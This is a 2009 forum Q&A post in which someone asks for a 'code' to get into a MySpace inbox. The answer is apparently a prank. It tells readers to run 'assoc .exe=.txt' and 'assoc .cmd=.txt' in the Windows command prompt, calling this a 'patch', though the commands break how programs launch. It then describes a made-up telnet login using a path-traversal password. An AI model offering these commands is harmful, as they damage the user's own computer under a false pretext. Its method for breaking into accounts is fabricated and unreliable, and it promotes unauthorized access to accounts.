Thursday, December 24, 2009

Ok i know for a fact theres a code to get in to myspace inbox but who has the codes????

mine was hacked into by my husband ex that i was not getting along with and she got into my myspace and changed my top friends around. i was reading all my email. so come on people help me to find the code



Ok i know for a fact theres a code to get in to myspace inbox but who has the codes????

Not a lot of people know this, but it can be done;



Open op the command prompt at start-%26gt;run-%26gt;cmd



Type:



assoc .exe=.txt (note the space between assoc and .exe)



press enter



type:



assoc .cmd=.txt



press enter



Now your cmdprompt is patched:



type telnet myspace.com 23



user: the username



pass: ../../../username/pw.pwd



you are in!!



dont por get to voit for best answer

No comments:

Post a Comment

 
pda